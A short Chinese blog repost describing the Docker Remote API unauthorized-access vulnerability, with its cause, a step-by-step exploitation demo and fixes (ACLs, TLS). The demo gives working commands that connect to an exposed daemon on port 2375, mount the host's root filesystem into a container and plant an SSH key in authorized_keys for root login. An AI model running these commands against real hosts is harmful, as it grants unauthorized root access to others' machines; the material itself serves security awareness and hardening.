Docker Remote Api未授权访问漏洞
来源:互联网 发布:微信抢红包开挂软件 编辑:程序博客网 时间:2024/04/29 00:39
一. 漏洞原因
dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375
docker守护进程监听在0.0.0.0,外网可访问
没有使用iptables等限制可连接的来源ip
二. 漏洞利用
1.远程对被攻击的主机的docker容器进行操作
docker -H tcp://remoteip:2375 images
- 远程启动被攻击主机的docker容器.并挂在宿主机的目录,通过容器修改宿主机的authrized_keys文件,写入公钥.
docker -H tcp://remoteip:2375 run -it -v /:/mnt imageId /bin/bash
三. 演示步骤
ssh-keygen 生成公钥文件
docker -H tcp://remoteip:2375 images 查看镜像
docker -H tcp://remoteip:2375 run -it -v /:/mnt imageId /bin/bash 启动一个容器并将宿主机根目录挂在到容器的mnt目录
mkdir .ssh 创建ssh目录
touch authorized_keys 创建文件
将公钥的文件写入authorized_keys
ssh root@remoteip 免密码登录宿主机
四. 修复方法
设置ACL, 只允许信任ip连接对应端口
开启TLS,使用生成的证书进行认证
https://docs.docker.com/engine/security/https/
阅读全文
0 0
- Docker Remote Api未授权访问漏洞
- Docker Remote API未授权访问漏洞分析和利用
- Docker Remote API未授权访问漏洞分析和利用
- 关于docker remote api未授权访问漏洞的学习与研究
- 验证docker的Redis镜像也存在未授权访问漏洞
- Redis 未授权访问漏洞
- Redis未授权访问漏洞
- Redis未授权访问漏洞
- redis未授权访问漏洞
- Redis 未授权访问漏洞
- MongoDB数据库未授权访问漏洞
- Memcached 未授权访问漏洞及加固
- CouchDB未授权访问导致执行任意系统命令漏洞
- Redis 未授权访问漏洞讲解利用加批量寻找
- Memcache未授权访问漏洞利用及修复
- MongoDB数据库未授权访问漏洞及加固
- Redis3未授权访问漏洞导致服务器被入侵
- 阿里云服务器 memcached未授权访问漏洞
- DuiLib消息处理剖析
- 555定时器应用之--多谐振荡器
- 项目实训-千寻-服务端代码部署阿里云
- Parcelable与Serializable的性能比较
- Java.lang.ClassCastException: $$_javassist_2 cannot be cast to javassist.util.proxy.Proxy
- Docker Remote Api未授权访问漏洞
- 浏览器兼容性问题详解
- 001【2D Rougelike】随机地图的生成
- python基础之列表list元组tuple
- mac 下安装redis-py
- [JS]JS模拟Alert弹出框效果--自定义CSS样式
- redis未授权访问漏洞
- 纯JS轮播图,左右箭头/轮播点,自动+自适应屏幕+手机触屏滑动
- Java开发中三种常用集合